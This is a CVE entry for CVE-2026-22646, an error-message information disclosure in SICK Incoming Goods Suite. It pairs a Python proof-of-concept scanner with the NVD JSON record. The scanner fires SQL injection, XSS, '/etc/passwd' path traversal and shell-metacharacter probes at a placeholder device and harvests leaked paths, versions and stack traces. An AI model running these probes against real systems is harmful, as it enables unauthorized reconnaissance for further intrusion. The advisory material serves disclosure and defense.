CVE-2026-22646

# CVE-2026-22646 Information Disclosure PoC # Target: SICK products with verbose error messages # This PoC demonstrates how to trigger and collect sensitive error information import requests import re import json from urllib.parse import urljoin class CVE202622646_PoC: def __init__(self, target_url): self.target_url = target_url self.session = requests.Session() self.findings = [] def test_error_triggering_payloads(self): """Test various payloads to trigger error disclosure""" payloads = [ {"name": "SQL Injection probe", "data": {"input": "' OR '1'='1"}}, {"name": "XSS probe", "data": {"input": "<script>alert('XSS')</script>"}}, {"name": "Path traversal", "data": {"file": "../../etc/passwd"}}, {"name": "Invalid JSON", "data": "{invalid json"}, {"name": "Long string overflow", "data": {"input": "A" * 10000}}, {"name": "Special characters", "data": {"input": "$;|`<>"}}, ] for payload in payloads: try: response = self.session.post( self.target_url, json=payload["data"], timeout=10, verify=False ) self.analyze_error_response(response, payload["name"]) except requests.exceptions.RequestException as e: print(f"Request failed for {payload['name']}: {e}") def analyze_error_response(self, response, probe_type): """Analyze response for information disclosure patterns""" sensitive_patterns = { "file_path": r"(/[a-zA-Z0-9_/.-]+)+", "database_error": r"(SQL|mysql|postgresql|sqlite|oracle)\s+(error|exception)", "stack_trace": r"(at\s+[\w.]+\([^)]*\)|Exception in thread)", "version_info": r"(Version|version)[=:][\s]*[0-9.]+", "internal_ip": r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", "config_path": r"(config|conf|cfg)\.[a-z]+", } response_text = response.text.lower() detected_info = [] for info_type, pattern in sensitive_patterns.items(): matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: detected_info.append({"type": info_type, "matches": matches[:5]}) if detected_info: self.findings.append({ "probe": probe_type, "status_code": response.status_code, "disclosed_info": detected_info }) def generate_report(self): """Generate vulnerability assessment report""" report = { "cve_id": "CVE-2026-22646", "target": self.target_url, "vulnerability": "Information Disclosure via Verbose Error Messages", "findings": self.findings, "severity": "MEDIUM (CVSS 4.3)", "recommendation": "Configure application to return generic error messages to users" } return json.dumps(report, indent=2) if __name__ == "__main__": target = "https://target-sick-device.local/api/endpoint" poc = CVE202622646_PoC(target) poc.test_error_triggering_payloads() print(poc.generate_report())

{"cve": {"id": "CVE-2026-22646", "sourceIdentifier": "[email protected]", "published": "2026-01-15T14:16:28.430", "lastModified": "2026-01-29T16:18:21.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Certain error messages returned by the application expose internal system details that should not be visible to end users, providing attackers with valuable reconnaissance information (like file paths, database errors, or software versions) that can be used to map the application's internal structure and discover other, more critical vulnerabilities."}, {"lang": "es", "value": "Ciertos mensajes de error devueltos por la aplicación exponen detalles internos del sistema que no deberían ser visibles para los usuarios finales, proporcionando a los atacantes información valiosa de reconocimiento (como rutas de archivos, errores de base de datos o versiones de software) que puede ser utilizada para mapear la estructura interna de la aplicación y descubrir otras vulnerabilidades más críticas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:incoming_goods_suite:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.1", "matchCriteriaId": "E6E02E7A-B758-4262-9F62-24229C60F17A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}